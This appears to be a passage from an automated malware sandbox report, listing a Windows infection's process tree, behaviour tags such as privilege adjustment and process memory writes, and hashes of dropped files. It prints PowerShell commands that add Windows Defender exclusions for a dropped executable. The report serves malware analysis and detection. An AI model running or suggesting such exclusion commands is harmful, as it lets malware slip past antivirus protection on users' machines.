- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" C:\Program Files\Windows Defender\MSASCui.exe6⤵PID:2216
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |1268|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:972
-
-
-
-
-
C:\Users\Public\www.rotkit.exe"C:\Users\Public\www.rotkit.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\KktXMQ.exeC:\Users\Admin\AppData\Local\Temp\KktXMQ.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2288
-
-
-
C:\Users\Public\www.XClient.exe"C:\Users\Public\www.XClient.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1230768309123318015911933547982072644801-1281397342-626997755-5050359891397374683"1⤵PID:3008
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-920755507-2376786541660806136-1743545549-19072453492069433951-614233662-1643902594"1⤵PID:236
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2130167108-573407129-5003652641010545763967081448802486604261491378-202197800"1⤵PID:2900
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD514275b16f595d4be6ec8c446f2d251a3
SHA1939a7b36028ff8d5d2553b461764340103b4575a
SHA256b524d9c3b4df769b9ffab8f1744a074393c8a7d3c9bb5770d3e617b6b262903f
SHA51246b6ec84d29aba325333607bff13c4d826f9c5b6613d9b552bc77515f572a8abae489a0d53639ca14012f992abf0fe2cf7385b9fc14d4ae98a098da1b87c3a55
-
Filesize
447KB
MD558008524a6473bdf86c1040a9a9e39c3
SHA1cb704d2e8df80fd3500a5b817966dc262d80ddb8
SHA2561ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326
SHA5128cf492584303523bf6cdfeb6b1b779ee44471c91e759ce32fd4849547b6245d4ed86af5b38d1c6979729a77f312ba91c48207a332ae1589a6e25de67ffb96c31
-
Filesize
2KB
MD5da36d056daced94e517e9b7146ce1169
SHA145da9e124d2b56c0b4d0e87ebb23594ff82eadc3
SHA256ddd2da00f126960a588809e89bfbf62680442603cf259b8af3ff054a5d628e67
SHA512b9e0362e91a00d1107c73f88cb53b911d833136bc3b36e45ec0608d3e71180eb2f61b6cacfc6504bcf4d0e259134c077a570e289746ed3d1fded0aba37b74237
-
Filesize
270KB
MD5e517c44a1d94b26482966357955ae862
SHA161427663e8ad9dcc2e1338511fa934f22a2dfa6f
SHA256e07015ea88987078352d3c581f636fdafd14dd620d85f55a1abf83b45bd29c9c
SHA512985d4137ed1849261aa588082b8afd5e7ce49ab1458283e5bf06850ab5c15b4d4342156fafaef35e969199c5007009220e089fd9d9544c55ef5212b0b2195c8e
-
Filesize
181KB
MD58d4a383b2c666be4f33695921263bb73
SHA19f565101a95a28a9b11f861306d3092417eb006d
SHA25630bbd62a849b00c878ec5a30d66923d9c247623f385e9891874966761f284535
SHA512ac8abd9461577cb9dec411d4e47dab666635c99e3ba2ca42834c9ce502a8892bec6254bf9564dd530aa3cf53de72773a258778d7eef22882c6ee3e57d6602edc
-
Filesize
160B
MD558f8eb09a822c09fc11f5a42baae36f1
SHA19e7063eeee62c8588e0020bef3a116e9379966aa
SHA2566509c7fc4fa70391399831bbc3d66206d3f6f8f2bb20ffcac4e04844861d733a
SHA51253806780934bd86bb032ee4a515dfc0e8464a5ecc5f4c8c593304fcd969c1058d443bdec54e7ae21469adb942b16693cc9eaf997217adc69d3618ab0ec99dc1e
-
Filesize
233B
MD5cd4326a6fd01cd3ca77cfd8d0f53821b
SHA1a1030414d1f8e5d5a6e89d5a309921b8920856f9
SHA2561c59482111e657ef5190e22de6c047609a67e46e28d67fd70829882fd8087a9c
SHA51229ce5532fb3adf55caa011e53736507fbf241afee9d3ca516a1d9bffec6e5cb2f87c4cd73e4da8c33b8706f96ba3b31f13ce229746110d5bd248839f67ec6d67
-
Filesize
37KB
MD53bc9acd9c4b8384fb7ce6c08db87df6d
SHA1936c93e3a01d5ae30d05711a97bbf3dfa5e0921f
SHA256a3d7de3d70c7673e8af7275eede44c1596156b6503a9614c47bad2c8e5fa3f79
SHA512f8508376d9fb001bce10a8cc56da5c67b31ff220afd01fb57e736e961f3a563731e84d6a6c046123e1a5c16d31f39d9b07528b64a8f432eac7baa433e1d23375
-
Filesize
14KB
MD59d5a0ef18cc4bb492930582064c5330f
SHA12ec4168fd3c5ea9f2b0ab6acd676a5b4a95848c8
SHA2568f5bbcc572bc62feb13a669f856d21886a61888fd6288afd066272a27ea79bb3
SHA5121dc3387790b051c3291692607312819f0967848961bc075799b5a2353efadd65f54db54ddf47c296bb6a9f48e94ec83086a4f8bf7200c64329a73fc7ec4340a4
-
Filesize
12KB
MD5efe44d9f6e4426a05e39f99ad407d3e7
SHA1637c531222ee6a56780a7fdcd2b5078467b6e036
SHA2565ea3b26c6b1b71edaef17ce365d50be963ae9f4cb79b39ec723fe6e9e4054366
SHA5128014b60cef62ff5c94bf6338ee3385962cfc62aaa6c101a607c592ba00aea2d860f52e5f52be2a2a3b35310f135548e8d0b00211bfcf32d6b71198f5d3046b63
-
Filesize
7KB
MD5ecffd3e81c5f2e3c62bcdc122442b5f2
SHA1d41567acbbb0107361c6ee1715fe41b416663f40
SHA2569874ab363b07dcc7e9cd6022a380a64102c1814343642295239a9f120cb941c5
SHA5127f84899b77e3e2c0a35fb4973f4cd57f170f7a22f862b08f01938cf7537c8af7c442ef2ae6e561739023f6c9928f93a59b50d463af6373ed344f68260bc47c76